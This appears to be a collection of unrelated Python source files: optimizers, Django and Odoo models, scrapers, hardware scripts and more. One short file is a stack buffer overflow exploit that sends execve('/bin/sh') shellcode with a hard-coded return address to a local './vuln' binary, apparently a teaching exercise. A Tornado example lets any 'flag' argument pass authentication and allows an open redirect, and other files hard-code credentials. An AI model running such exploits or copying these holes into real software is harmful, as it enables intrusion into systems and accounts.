self.epsilon = epsilon
self.scale_grad_by_procs = scale_grad_by_procs
total_params = sum([U.num_elements(param) for param in U.get_flat_params(self.param_groups)])
if ptu.get_mode() == "gpu_opt":
assert gpu_id is not None
self.m = torch.zeros(total_params, dtype=torch.float32).to(device=F"cuda:{gpu_id}")
self.v = torch.zeros(total_params, dtype=torch.float32).to(device=F"cuda:{gpu_id}")
elif not ptu.get_mode(): #CPU is false
self.m = torch.zeros(total_params, dtype=torch.float32)
self.v = torch.zeros(total_params, dtype=torch.float32)
else:
print(ptu.get_mode())
raise NotImplementedError
self.t = 0
self.set_params_from_flat = U.SetFromFlat(self.param_groups)
self.get_params_as_flat = U.GetParamsFlat(self.param_groups)
self.comm = MPI.COMM_WORLD if comm is None and MPI is not None else comm
def __getstate__(self):
# d = Serializable.__getstate__(self)
# d = dict()
d = super().__getstate__()
d['lr'] = self.lr
d['beta1'] = self.beta1
d['beta2'] = self.beta2
d['epsilon'] = self.epsilon
d['scale_grad_by_procs'] = self.scale_grad_by_procs
d["m"] = self.m.clone()
d["v"] = self.v.clone()
d["t"] = self.t
return d
def __setstate__(self, d):
# Serializable.__setstate__(self, d)
super().__setstate__(d)
if "lr" in d.keys():
self.lr = d['lr']
else:
self.lr = 3E-4
self.beta1 = d['beta1']
self.beta2 = d['beta2']
self.epsilon = d['epsilon']
self.scale_grad_by_procs = d['scale_grad_by_procs']
self.m = d["m"]
self.v = d["v"]
self.t = d["t"]
def reset_state(self, gpu_id=0):
self.m = torch.zeros_like(self.m, dtype=torch.float32).to(device=F"cuda:{gpu_id}")
self.v = torch.zeros_like(self.v, dtype=torch.float32).to(device=F"cuda:{gpu_id}")
def reconnect_params(self, params):
super().__init__(params, dict()) # This does not alter the optimizer state m or v
self.reinit_flat_operators()
def reinit_flat_operators(self):
self.set_params_from_flat = U.SetFromFlat(self.param_groups)
self.get_params_as_flat = U.GetParamsFlat(self.param_groups)
def step(self, closure=None):
"""
Aggregate and reduce gradients across all threads
:param closure:
:return:
"""
# self.param_groups updated on the GPU, stepped, then moved back to its own thread
localg = U.get_flattened_grads(self.param_groups)
if self.t % 100 == 0:
self.check_synced()
if localg.device.type == "cpu":
localg = localg.detach().numpy()
else:
localg = localg.cpu().detach().numpy()
if self.comm is not None:
globalg = np.zeros_like(localg)
self.comm.Allreduce(localg, globalg, op=MPI.SUM)
if self.scale_grad_by_procs:
globalg /= self.comm.Get_size()
if localg.shape[0] > 1 and self.comm.Get_size() > 1:
assert not (localg == globalg).all()
globalg = ptu.from_numpy(globalg, device=torch.device(ptu.get_device()))
else:
globalg = ptu.from_numpy(localg, device=torch.device(ptu.get_device()))
self.t += 1
a = self.lr * math.sqrt(1 - self.beta2**self.t)/(1 - self.beta1**self.t)
self.m = self.beta1 * self.m + (1 - self.beta1) * globalg
self.v = self.beta2 * self.v + (1 - self.beta2) * (globalg * globalg)
step_update = (- a) * self.m / (torch.sqrt(self.v) + self.epsilon)
# print("before: ")
# print(self.get_params_as_flat())
self.set_params_from_flat((self.get_flat_params() + step_update).to(device=torch.device("cpu")))
# print("after, in mpi adam: ")
# print(self.get_params_as_flat())
def sync(self):
if self.comm is None:
return
theta = ptu.get_numpy(self.get_params_as_flat())
self.comm.Bcast(theta, root=0)
self.set_params_from_flat(ptu.from_numpy(theta))
def check_synced(self):
# If this fails on iteration 0, remember to call SYNC for each optimizer!!!
if self.comm is None:
return
if self.comm.Get_rank() == 0: # this is root
theta = ptu.get_numpy(self.get_params_as_flat())
self.comm.Bcast(theta, root=0)
else:
thetalocal = ptu.get_numpy(self.get_params_as_flat())
thetaroot = np.empty_like(thetalocal)
self.comm.Bcast(thetaroot, root=0)
assert (thetaroot == thetalocal).all(), (thetaroot, thetalocal)
def to(self, device=None):
if device is None:
device = ptu.device
self.m = self.m.to(device=device)
self.v = self.v.to(device=device)
def get_flat_params(self):
"""
Get params from a CPU thread
:return:
"""
return torch.cat([param.view([U.num_elements(param)]) for param in U.get_flat_params(self.param_groups)], dim=0) |
from collections import OrderedDict
import re, os
import Config
class subgroup(object):
def __init__(self, colorName, word_list):
self.colorName = colorName
self.word_list = word_list
def add_words(self, word_list):
for word in word_list:
self.word_list.append(word)
def check_word(self,word):
return word in self.word_list
def set_wordlist(self, word_list):
self.word_list = word_list.split(',')
class groups(object):
def __init__(self, group):
self.group = group
self.colorName = OrderedDict([])
def lookup_colorName(self, colorName):
return self.colorName.get(colorName)
def add_colorName(self, colorName, word_list):
cN = self.lookup_colorName(colorName)
if cN is not None:
cN.add_words(word_list)
else:
self.colorName[colorName] = subgroup(colorName, word_list)
def find_word(self, word):
for colorName in self.colorName.items():
if colorName[1].check_word(word):
return colorName[0]
def set_wordlist(self, colorName, word_list):
cN = self.lookup_colorName(colorName)
if cN is not None:
cN.set_wordlist(word_list)
class color_grouping(object):
def __init__(self):
self.groups = OrderedDict([])
self.datafile_path = Config.settings.wordcolor_path
self.data_format = '\[(?P<group>\w+)\]\[(?P<colorName>\w+|\s*)\]\s*\"(?P<word_list>.+)\"'
self.reload()
def reload(self):
self.load_color_data()
def lookup_group(self, group):
return self.groups.get(group)
def load_color_data(self):
"""Parse all entry of the wordcolor.txt file
"""
self.groups.clear()
if os.path.isfile(self.datafile_path):
with open(self.datafile_path, 'r') as fi:
for line in fi:
if not re.match('\#.+', line) and not re.match('\s*$', line) and len(line.strip()) != 0:
mat = re.match(self.data_format, line)
if mat:
group = mat.group("group")
colorName = mat.group("colorName")
word_list_str = mat.group("word_list")
if not self.lookup_group(group):
self.groups[group] = groups(group)
self.lookup_group(group).add_colorName(colorName, word_list_str.split(','))
def get_all_colorname(self):
colors=[]
for group in self.groups:
for colorName in self.groups[group].colorName:
if colorName not in colors:
colors.append(colorName)
return colors
def get_colorname(self,word,group):
"""Get the colorname of a word in a group
check in the default group if nothing found in
the given group
"""
if group in self.groups:
cN=self.groups[group].find_word(word)
if cN:
return cN
cND=self.groups['General'].find_word(word)
if cND:
return cND
def get_all_group_words(self,group):
""" Return all the words of a group and
the ones in the default group
"""
l=[]
for colorName in self.groups['General'].colorName:
for word in self.groups['General'].colorName[colorName].word_list:
l.append(word)
if group in self.groups:
for colorName in self.groups[group].colorName:
for word in self.groups[group].colorName[colorName].word_list:
l.append(word)
return l
wd = color_grouping()
|
# first-program
#HHHIIIIIIIII#@^%$#@%@#
print("hello world");
#hiii
#blah
|
import mraa
import time
#mraa.gpio60 = P9_14 = GPIO_50
#mraa.gpio62 = P9_16 = GPIO_51
gpio_1 = mraa.Gpio(60)
gpio_2 = mraa.Gpio(62)
# set gpio 60 and gpio 62 to output
gpio_1.dir(mraa.DIR_OUT)
gpio_2.dir(mraa.DIR_OUT)
# toggle both gpio's
while True:
gpio_1.write(1)
gpio_2.write(0)
time.sleep(1)
gpio_1.write(0)
gpio_2.write(1)
time.sleep(1)
|
def minVertex(S, C):
min = -1
for i in range(0,len(S)):
if S[i]==0 and (min == -1 or C[i]<C[min]):
min = i
return min
def prim(G):
#Graph G to be defined as an adjacency matrix
C = list()
S = list()
P = list()
for i in range(0, len(G)):
C.append(-1)
S.append(0)
P.append(-1)
S[0] = 1
for v in range(0,len(G)):
for w in range(0,len(G)):
if G[v][w] > 0:
if G[v][w] < C[w] or C[w]==-1:
P[w] = v
C[w] = G[v][w]
v = minVertex(S,C)
S[v]=1
return (P,C,S)
|
from django.contrib import admin
# Register your models here.
from .models import *
admin.site.register(Camp)
admin.site.register(User)
admin.site.register(Group)
admin.site.register(Bot)
admin.site.register(Message)
admin.site.register(Favorite)
admin.site.register(Access_Token) |
#!/usr/bin/env python
import struct
import subprocess
# vuln.c buf addr
ret_addr = 0x7fffffffe1b0
ret_addr = 0x7fffffffe0a0
# execve(/bin/sh)
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
buf = shellcode
buf += "A" * (256 + 8 - len(shellcode))
buf += struct.pack("<Q", ret_addr).rstrip("\0")
subprocess.call(["./vuln", buf])
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError
class employee_loan_type(models.Model):
_name = 'employee.loan.type'
_description = 'employee_loan_type'
name = fields.Char('Nombre', required="1")
loan_limit = fields.Float('Límite del monto del deducción', default=50000, required="1")
loan_term = fields.Integer('Plazo de la deducción', default=12, required="1")
is_apply_interest = fields.Boolean('Aplicar interés')
interest_rate = fields.Float('Taza de interés',default=10)
interest_type = fields.Selection([('liner','Sobre monto total'),('reduce','Sobre saldo pendiente')],string='Tipo de interés',
default='liner')
loan_account = fields.Many2one('account.account',string='Cuenta de prestamo')
interest_account = fields.Many2one('account.account',string='Cuenta de intereses')
journal_id = fields.Many2one('account.journal',string='Diario')
periodo_de_pago = fields.Selection([('Semanal','Semanal'), ('Quincenal','Quincenal')], string='Periodo de pago', required="1")
tipo_deduccion = fields.Selection([('1','Préstamo'), ('2','Descuento periodico 1'), ('3','Descuento periodico 2')], string='Tipo de deducción', required="1")
@api.constrains('is_apply_interest','interest_rate','interest_type')
def _check_interest_rate(self):
for loan in self:
if loan.is_apply_interest:
if loan.interest_rate <= 0:
raise ValidationError("La tasa de interés debe ser mayor de 0.00")
if not loan.interest_type:
raise ValidationError("Por favor seleccione el tipo de interés")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
import unittest
from katas.kyu_7.unique_pairs import projectPartners
class UniquePairsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(projectPartners(2), 1)
def test_equals_2(self):
self.assertEqual(projectPartners(3), 3)
def test_equals_3(self):
self.assertEqual(projectPartners(4), 6)
def test_equals_4(self):
self.assertEqual(projectPartners(5), 10)
|
# -*- coding:utf-8 -*-
# Author: Jorden Hai
count = 0.4
sum = 0
for i in range(1,31):
sum = sum + count
count = count *2
print(sum)
|
"""
Problem 3: I like to move it, move it
"""
import numpy as np
#load number of trucks for locations on corridors
arr = np.load("arrays.npy")
trucks_per_location = arr.tolist()
#ENVIRONMENTAL COMPUTATIONS
#define social cost per mile for each diesel truck - from environmental computations
cost_per_mile = 0.27
#define distances between each charging station
distances = [35.5675, 23.0113, 23.7788, 23.4375, 31.2500] #distance is range/8, in miles
#calculate total carbon emissions per distance for each route
environmental_costs = [] #output list
for i in range(len(distances)): #this iterates through each route
total_cost = 0 #this is the environmental cost for that route
for stop in trucks_per_location[i]:
cost = distances[i] * stop * cost_per_mile #cost for that stop
total_cost += cost
environmental_costs.append(total_cost)
#ECONOMIC COMPUTATIONS
#charger stop computations
#determine number of charges per stop, is trucks/128
chargers_per_location = arr/128
#take sum of all chargers on each route
charger_costs = [] #output list for economic costs
for i in range(len(chargers_per_location)):
n = sum(chargers_per_location[i])
cost = (-500*n) + (0.37*16*n)
charger_costs.append(cost)
#rest stop computations
rest_stop_costs = [] #rest stop cost is money earned for rest stop - money earned for diesel
#distances between each routes
route_lengths = [543.3, 408, 390.4, 706.2, 381.9]
#list constants from tables
c1 = 1347.516
c2 = 5377.758
for i in range(len(trucks_per_location)):
#determine rest stop gains
gains = 0
for stop in trucks_per_location[i]:
gain_from_stop = c1 * (stop/624)
gains += gain_from_stop
#determine rest stop loss from not selling diesel
loss = c2 * (route_lengths[i]/27.33)
rest_stop_cost = gains - loss
rest_stop_costs.append(rest_stop_cost)
#compute total costs and benefits (negative is cost, positive is benefits)
total_costs = []
for i in range(len(trucks_per_location)):
cost_route = environmental_costs[i] + charger_costs[i] + rest_stop_costs[i]
total_costs.append(cost_route)
|
"""Startup Sequence
Runs a wave sequence of lights from left to right letting us know that the
system is ready.
Author:
Yvan Satyawan <y_satyawan@hotmail.com>
Created on:
May 12, 2021
"""
import board
import neopixel
from math import sin, pi, floor
from time import sleep, time
SLEEP_DURATION = 1
PIXEL_PIN = board.D12
NUM_PIXELS = 45
BRIGHTNESS = 0.2
ORDER = neopixel.RGB
LED_COLUMNS = (0, 10, 25, 35, 45)
PIXELS = neopixel.NeoPixel(PIXEL_PIN, NUM_PIXELS, brightness=BRIGHTNESS,
auto_write=False, pixel_order=ORDER)
def startup():
sleep(3)
start_time = time()
time_delta = 0.
# 1.477 is where sin(pi * x - 1.5) intercepts the y-axis
while time_delta < 1.477:
time_delta = time() - start_time
for column in range(4):
# Calculate brightness of a column for the given frame
frame_brightness = floor(255. * sin((pi * time_delta)
- (float(column) * 0.5)))
# Make sure it's positive
frame_brightness = max(frame_brightness, 0)
for pixel_num in range(LED_COLUMNS[column],
LED_COLUMNS[column + 1]):
# set all pixels of the column one by one
PIXELS[pixel_num] = (frame_brightness, frame_brightness,
frame_brightness)
PIXELS.show()
sleep(0.0005)
# Turn off all LEDs just in case
for i in range(LED_COLUMNS[-1]):
PIXELS[i] = (0, 0, 0)
if __name__ == '__main__':
startup()
|
import tornado.web
from tornado.web import RequestHandler
# class IndexHandler(RequestHandler):
# def get(self, *args, **kwargs):
# self.write("sunck is a good man")
class StaticFileHandler(tornado.web.StaticFileHandler):
def __init__(self, *args, **kwargs):
super(StaticFileHandler, self).__init__(*args, **kwargs)
self.xsrf_token
#cookie
class PCookieHandler(RequestHandler):
def get(self, *args, **kwargs):
#设置
self.set_cookie("sunck","good")
# self.set_header("Set-Cookie","kaige=nice; Path=/")
self.write("ok")
class GetPCookieHandler(RequestHandler):
def get(self, *args, **kwargs):
#获取cookie
cookie = self.get_cookie("sunck", "未登录")
print("cookie =", cookie)
self.write("ok")
class ClearPCookieHandler(RequestHandler):
def get(self, *args, **kwargs):
#清除一个cookie
# self.clear_cookie("sunck")
#清除所有cookie
self.clear_all_cookies()
self.write("ok")
#安全cookie
class SCookieHandler(RequestHandler):
def get(self, *args, **kwargs):
self.set_secure_cookie("zhangmanyu","nice")
self.write("ok")
class GetSCookieHandler(RequestHandler):
def get(self, *args, **kwargs):
scookie = self.get_secure_cookie("zhangmanyu")
print("scookie =", scookie)
self.write("ok")
#cookie计数
class CookieNumHandler(RequestHandler):
def get(self, *args, **kwargs):
count = self.get_cookie("count","未登录")
self.render('cookienum.html', count = count)
class PostFileHandler(RequestHandler):
def get(self, *args, **kwargs):
self.render('postfile.html')
def post(self, *args, **kwargs):
count = self.get_cookie("count", None)
if not count:
count = 1
else:
count = int(count)
count += 1
self.set_cookie("count", str(count))
self.redirect("/cookienum")
class SetXSRFCookie(RequestHandler):
def get(self, *args, **kwargs):
#设置_xsrf的cookie
self.xsrf_token
self.finish("Ok")
#用户验证
class LoginHandler(RequestHandler):
def get(self, *args, **kwargs):
next = self.get_argument("next", "/")
url = "login?next=" + next
self.render("login.html", url = url)
def post(self, *args, **kwargs):
name = self.get_argument("username")
pawd = self.get_argument("passwd")
if name == "1" and pawd == "1":
next = self.get_argument("next", "/")
self.redirect(next+"?flag=logined")
else:
next = self.get_argument("next", "/")
print("next = ", next)
self.redirect("/login?next="+next)
class HomeHandler(RequestHandler):
def get_current_user(self):
# /home
flag = self.get_argument("flag", None)
return flag
@tornado.web.authenticated
def get(self, *args, **kwargs):
self.render("home.html")
class CartHandler(RequestHandler):
def get_current_user(self):
# /home
flag = self.get_argument("flag", None)
return flag
@tornado.web.authenticated
def get(self, *args, **kwargs):
self.render("cart.html")
|
import numpy as np
from matplotlib import pyplot as plt
import pandas as pd
from ggplot import *
from sklearn.metrics import *
class Eval():
def __init__(self, y, pred, labels):
self.y = y
self.y01 = []
self.pred = pred
self.pred01 = []
self.labels = labels
self.fp = 0.
self.tp = 0.
self.p = 0.
self.fn = 0.
self.tn = 0.
self.n = 0.
self.cm = []
self.auc = []
def computeErrors(self):
print("Compute False/True Positive/Negative")
for i in range(len(self.y)):
yi = self.y[i]
yhi = self.pred[i]
if yi == 'Yes' or yi == 'yes' or yi == 'true' or yi == 'True' \
or yi == True or yi == 1:
self.y01.append(1)
if yi == yhi:
self.tp += 1
self.pred01.append(1)
else:
self.fn += 1
self.pred01.append(0)
else:
self.y01.append(0)
if yi == yhi:
self.tn += 1
self.pred01.append(0)
else:
self.fp += 1
self.pred01.append(1)
self.p = self.tp + self.fn
self.n = self.fp + self.tn
def plot_confusion_matrix(self):
plt.imshow(self.cm, interpolation='nearest')
plt.title('Confusion matrix')
plt.colorbar()
tick_marks = np.arange(len(self.labels))
plt.xticks(tick_marks, self.labels, rotation=45)
plt.yticks(tick_marks, self.labels)
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
for x in range(len(self.cm)):
for y in range(len(self.cm[x])):
plt.annotate(str(self.cm[x][y]), xy=(y, x))
def confusionMatrix(self):
self.cm = confusion_matrix(self.y, self.pred)
plt.figure()
self.plot_confusion_matrix()
plt.savefig('confusion_matrix.png')
def DET_curve(self):
fpr, tpr, _ = roc_curve(self.y01, self.pred01)
fnr = []
for i in range(len(tpr)):
fpr[i] *= self.n
tpr[i] *= self.p
fnr.append(self.p - tpr[i])
print(fpr)
print(fnr)
df = pd.DataFrame(fpr, fnr)
det = ggplot(df, aes(x=fpr, y=fnr), log='y') \
+ geom_line() \
+ xlab("False Positive Rate") + ylab("False Negative Rate") \
+ scale_x_log10() + scale_y_log10() \
+ ggtitle("Detection Error Tradeoff (DET) curve")
ggsave(det, 'DET')
def ROC_curve(self):
fpr, tpr, _ = roc_curve(self.y01, self.pred01)
auc_roc = auc(fpr, tpr)
df = pd.DataFrame(fpr, tpr)
pauc = ggplot(df, aes(x='fpr', ymin=0, ymax='tpr')) \
+ geom_area(alpha=0.2) \
+ xlab("True Positive Rate") + ylab("False Positive Rate") \
+ geom_line(aes(y='tpr')) \
+ ggtitle("ROC Curve | AUC = %s" % str(auc_roc))
ggsave(pauc, 'ROC')
print("AUC:\t\t\t", auc_roc)
print("GINI COEFFICIENT:\t", 2 * auc_roc - 1)
def precision_recall_curve(self):
precision, recall, _ = precision_recall_curve(self.y01, self.pred01)
avg = average_precision_score(self.y01, self.pred01)
df = pd.DataFrame(precision, recall)
pr = ggplot(df, aes(x=precision, y=recall)) \
+ geom_line() \
+ xlab("Precision") + ylab("Recall") \
+ ggtitle("Precision-Recall curve | AVG = %s" % str(avg))
ggsave(pr, 'Precision-Recall')
def fmeasure(self, beta):
beta = float(beta)
recall = self.recall()
precision = self.precision()
print(recall)
print(precision)
fm = ((1 + beta * beta) * recall * precision) \
/ (beta * beta * recall + precision)
print("F MEASURE:\t\t", fm)
def accuracy(self):
# Good classification rate
return (self.tp + self.tn) / (self.p + self.n)
def recall(self):
# Recall, true positive rate, sensitivity
return self.tp / self.p
def recallRate(self, tp, p):
# Recall, true positive rate, sensitivity
return tp / p
def falseAlarm(self):
# False alarm rate, false positive rate
return self.fp / self.n
def falseAlarmRate(self, fp, n):
# False alarm rate, false positive rate
return fp / n
def miss(self):
# Missed detection rate, false negative rate
return self.fn / self.p
def specificity(self):
# Specificity, true negative rate
return 1 - self.falseAlarm()
def precision(self):
# Precision
return self.tp / (self.tp + self.fp)
def fscore(self):
# F-score
return self.precision() * self.recall()
|
#!/usr/bin/env python3
from PIL.ExifTags import TAGS
from PIL import Image
import sys
img = #"1609060501529.png"
try:
exifData = {}
file = Image.open(img)
info = file._getexif()
print(info)
if info:
for (tag, value) in info.items():
decoded = TAGS.get(tag, tag)
exifData[decoded] = value
gps = exifData['GPSInfo']
if gps:
print("[X] " + img + " Datos GPS : " + gps)
except:
pass
|
import pytest
def test_idk():
assert False
def test_also_a_test():
assert 1 == 2//2
# classes with constructors cant be used as test containers
class TestWithConstructor(object):
def __init__(self):
pass
def test_wont_work(self):
assert False
class TestClassExample(object):
dog = 'dog'
backwardsdog = ''.join(['g', 'o', 'd'][::-1])
def is_it_dog(self, animal):
return animal == self.dog
def test_dog(self):
assert self.is_it_dog(self.backwardsdog)
def test_with_parameters(param_example):
assert type(param_example) == int
|
# The water-tank example coded in Python
# TODO: Still need to write the parser
import macropy.activate
from language import *
from gen import *
from sympy import *
import shac
# This is the Raskin model of the thermostat example
# K = 0.075 heating rate in t4, h = 150.
ode1 = Ode(sympify("diff(x(t))+x(t)-10"), S("x(t)"), 22.78, {})
ode2 = Ode(sympify("diff(x(t))+x(t)-37.78"), S("x(t)"), 22.78, {})
# The locations of the hybrid automaton
t1 = Loc("t1", [ode1], [],
{S("x(t)"): [Guard(S("x>22.78"))]})
t2 = Loc("t2", [ode2], [],
{S("x(t)"): [Guard(S("x<25"))]})
# The edges
e1 = Edge('t1', 't2', {S("x(t)"): [Guard(S("x<=22.78")),
]},
[Update.Update2(Symbol('x'), Symbol('x'))],
[])
e2 = Edge('t2', 't1', {S("x(t)"): [Guard(S("x>=25"))]},
[Update.Update2(Symbol('x'), Symbol('x'))],
[])
thermostat = Ha("thermostat", [t1, t2], t2,
[e1, e2], [], [])
# Compile
shac.compile(thermostat)
|
import pymysql
db=pymysql.connect('localhost','root','123456')
cur=db.cursor()
cur.execute("create database python;")
cur.execute("use python")
cur.execute("create table t1(id int,name char(20),age tinyint unsigned,sex enum('boy','girl'));")
cur.execute("insert into t1 values(1,'zhangsanfeng',30,'boy'),(2,'wuji.zhang',25,'boy'),(3,'panjielian',25,'girl'),(4,'ximenqing',40,'boy'),(5,'wudalang',33,'boy');")
cur.execute('select*from t1;')
data=cur.fetchone()
print('fetchone的结果是',data)
db.commit()
cur.close()
db.close()
|
# Import socket module
import socket
def Main():
host = socket.gethostname() # localmachine ip
# Define the port on which you want to connect
port = 12345
s = socket.socket()
# connect to server on local computer
s.connect((host,port))
# message you send to server
while True: # enter the message
message=input('-> ')
s.send(message.encode())
# messaga received from server
data = s.recv(1024)
# print the received message
print('Received from the server :',str(data.decode()))
# ask the client whether he wants to continue
ans = input('\nDo you want to continue(y/n) :')
if ans == 'y':
continue
else:
break
s.close()
if __name__ == '__main__':
Main() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from telegram.ext import Updater, MessageHandler, Filters
from telegram_util import splitCommand, log_on_fail, autoDestroy, formatChat, matchKey
from db import Source, Subscription
import loop
from common import tele, debug_group
from iterateMessage import iterateMessage
import traceback as tb
def commandImp(msg):
autoDestroy(msg)
command, text = splitCommand(msg.text)
if "s4_g" in command:
return msg.reply_text(iterateMessage(msg.chat.id), quote=False)
elif matchKey(command, ["s4_source_add", "s4_sa", "s4_a"]):
autoDestroy(msg.reply_text(Source.add(text)))
elif matchKey(command, ["s4_source_delete", "s4_sd", "s4_d"]):
autoDestroy(msg.reply_text(Source.remove(text)))
elif matchKey(command, ["s4_source_list", "s4_sl", "s4_l"]):
pass # intentional
elif matchKey(command, ["s4_sub", "s4_s"]):
Subscription.add(msg.chat.id, text)
else:
return
if matchKey(command, ["s4_source", "s4_sl", "s4_l", "s4_sa", "s4_a", "s4_sd", "s3_d"]):
sources = ['[%s](t.me/%s)' % (chatname, chatname) for \
chatname in Source.db.keys()]
autoDestroy(msg.reply_text('Source list: \n' + '\n'.join(sources),
parse_mode='Markdown',
disable_web_page_preview=True))
else:
autoDestroy(msg.reply_text("success"))
def command(update, context):
msg = update.effective_message
try:
commandImp(msg)
except Exception as e:
autoDestroy(msg.reply_text(str(e)))
tb.print_exc()
raise e
tele.dispatcher.add_handler(MessageHandler(Filters.command, command))
tele.start_polling()
tele.idle() |
from django.contrib import admin
from .models import Report, DLL, UsesDLL
class ReportAdmin(admin.ModelAdmin):
list_display = ('link', 'md5', 'file_type', 'date')
search_fields = ['link', 'md5']
class DLLAdmin(admin.ModelAdmin):
list_display = ('name',)
class UsesDLLAdmin(admin.ModelAdmin):
list_display = ('report', 'dll')
admin.site.register(Report, ReportAdmin)
admin.site.register(DLL, DLLAdmin)
admin.site.register(UsesDLL, UsesDLLAdmin)
|
from bs4 import BeautifulSoup
import requests
import random
import re
def Status():
r = requests.get("http://limitlessmc.net/")
soup = BeautifulSoup(r.text, "html.parser")
val = soup.select("#serverstatus")
return val[0].text
def wotd():
packet = {}
r = requests.get("https://www.merriam-webster.com/word-of-the-day")
soup = BeautifulSoup(r.text, "html.parser")
val = soup.select("div")
soup = BeautifulSoup(str(val[44]), "html.parser")
val = soup.select("span")
packet['Day'] = val[0].text[11:]
def ForumPost(url : str, num = 0):
r = requests.get(url)
soup = BeautifulSoup(r.text, "html.parser")
Side = soup.select("div.pull-left")
val = soup.select("div.content")
#mainclean = val[0].text
text = str(val[num]).split('<br/>')
text[num] = text[num].replace('<div class="content">', '')
text[len(text)-1] = text[len(text)-1].replace('</div>', '')
nText = []
for l in text:
nText.append(cleanLine(l))
mainclean = '\n'.join(nText)
clean = "**" + Side[2].text.replace("\n", '') + "**" + Side[3].text.replace('\t', '') + "------------------------------------" + "\n" + mainclean
if(len(clean) > 1500):
clean = clean[:1450] + "...\n------------------------------------\n*If you would like to read more, click the link below!*\n{}".format(url)
#print(clean)
return clean
def fmlText():
r = requests.get("http://www.fmylife.com/random")
soup = BeautifulSoup(r.text, "html.parser")
val = soup.select("p.content")
if(len(val) < 1):
print("ERROR in FML cmd")
r = requests.get("http://www.fmylife.com/random")
soup = BeautifulSoup(r.text, "html.parser")
val = soup.select("p.content")
return val[0].text
def cleanLine(line):
print('cleaning')
#print(line)
if('<span style="font-weight: bold">' in line):
line = line.replace('<span style="font-weight: bold">', '**')
line = line.replace('</span>', '**')
line.replace("\n", '')
#line = "**" + line + "**\n"
line = line.replace('<img alt=";)" src="./images/smilies/icon_e_wink.gif" title="Wink"/>', ';)')
line = line.replace('<img alt=":(" src="./images/smilies/icon_e_sad.gif" title="Sad"/>', ':(')
if('<a class="postlink" href="' in line):
line = line.replace('<a class="postlink" href="', '')
line = line.replace('</a>', '')
#print(line)
return line
def youtube(input1:str, num = 0):
r = requests.get("https://www.youtube.com/results?search_query="+input1)
soup = BeautifulSoup(r.text, "html.parser")
val = soup.select("h3")
m = re.search('href="/watch\?v=(.{11})"', str(val[4 + num]))
#print(str(val[4 + num]), '\n')
#print(m.group(0)[15:-1])
if(m == None):
return youtube(input1, num+1)
return 'https://www.youtube.com/watch?v=' + m.group(0)[15:-1]
def nextSong(url, num = 0):
r = requests.get(url)
soup = BeautifulSoup(r.text, "html.parser")
val = soup.select("a")
m = re.search('href="/watch\?v=(.{11})"', str(val[20 + num]))
if(m == None):
return nextSong(url, num+1)
return 'https://www.youtube.com/watch?v=' + m.group(0)[15:-1]
def wouldYouRather():
r = requests.get("http://either.io/")
soup = BeautifulSoup(r.text, "html.parser")
val = soup.select("span")
return [(val[6].text, val[11].text) , (val[7].text, val[15].text)]
# r = requests.get("https://www.merriam-webster.com/word-of-the-day")
# soup = BeautifulSoup(r.text, "html.parser")
# val = soup.select("div")
# #print(val[44])
# soup = BeautifulSoup(str(val[44]), "html.parser")
# val = soup.select("span")
# # #print(val[20])
# # m = re.search('href="/watch\?v=(.{11})"', str(val[20]))
# # print('https://www.youtube.com/watch?v=' + m.group(0)[15:-1])
# # count = 0
# # for v in val:
# # if count < 20:
# # try:
# # print(str(count), v.text)
# # except Exception as e:
# # print(e, "Error")
# # count += 1
# print(val[0].text[11:])
# packet = {}
# r = requests.get("https://www.merriam-webster.com/word-of-the-day")
# soup = BeautifulSoup(r.text, "html.parser")
# val = soup.select("div")
# soup2 = BeautifulSoup(str(val[44]), "html.parser")
# val2 = soup2.select("span")
# packet['Day'] = val2[0].text[11:-8]
# val3 = soup2.select("div")
# packet['Word'] = val3[4].text[1:-7]
# val4 = soup.select("p")
# packet['Defintion = ']
# count = 0
# for v in val4:
# if count < 20:
# try:
# print(str(count), v.text)
# except Exception as e:
# print(e, "Error")
# count += 1
# r = requests.get("http://either.io/")
# soup = BeautifulSoup(r.text, "html.parser")
# val = soup.select("span")
# count = 0
# for v in val:
# if count < 20:
# try:
# print(str(count), v.text)
# except Exception as e:
# print(e, "Error")
# count += 1
# print(val[6].text, val[11].text)
# print(val[7].text, val[15].text)
# for x in val3:
# print(x.text)
#print(val3)
#print(packet)
# print(val.text)
# while val[num].text == "Cacophony":
# num =+ 1
# try:
# print(val[num].text)
# except Exception:
# print("ERROR")
# f = open(val[23].text.strip(), 'r')
# print(f.read())
########### Getting Pictures #########################
# r = requests.get("http://pokemondb.net/pokedex/national")
# soup = BeautifulSoup(r.text, "html.parser")
# val = soup.select(".infocard-tall")
# name = "Venusaur"
# #print(val[ID(name) - 1]['class'])
# val2 = val[ID(name) - 1].select("a")
# count = 0
# print(val2[0]["data-sprite"]) |
import sys
import os
import subprocess
sys.path.insert(0, 'scripts')
sys.path.insert(0, 'scripts/generax')
import experiments as exp
import launch_alegenerax
import fam
def run(datadir, gene_trees, subst_model, transfer_constraint, cores, additional_arguments):
strategy = "SPR"
species_tree = "true"
base = "alegenerax_" + transfer_constraint.lower() + "_" + gene_trees + "_run"
resultsdir = fam.get_run_dir(datadir, subst_model, base)
additional_arguments.append("--transfer-constraint")
additional_arguments.append(transfer_constraint)
exp.reset_dir(resultsdir)
launch_alegenerax.run(datadir, subst_model, species_tree, gene_trees, cores, additional_arguments, resultsdir)
|
from django.contrib.auth import get_user_model
from django.db import models
# Create your models here.
from django.db.models import CheckConstraint
User = get_user_model()
class Category(models.Model):
title = models.CharField(max_length=50, unique=True)
slug = models.SlugField(max_length=50, primary_key=True)
image = models.ImageField(upload_to='categories', null=True, blank=True)
def __str__(self):
return self.title
class Product(models.Model):
title = models.CharField(max_length=50, unique=True)
slug = models.SlugField(max_length=50, primary_key=True)
description = models.TextField()
category = models.ForeignKey(Category, on_delete=models.CASCADE, related_name='products')
image = models.ImageField(upload_to='products')
storage = models.PositiveSmallIntegerField()
memory = models.PositiveSmallIntegerField()
color = models.CharField(max_length=100)
price = models.PositiveIntegerField()
created_at = models.DateField(auto_now_add=True)
class Meta:
ordering = ['-created_at']
def __str__(self):
return self.title
class Comment(models.Model):
text = models.TextField()
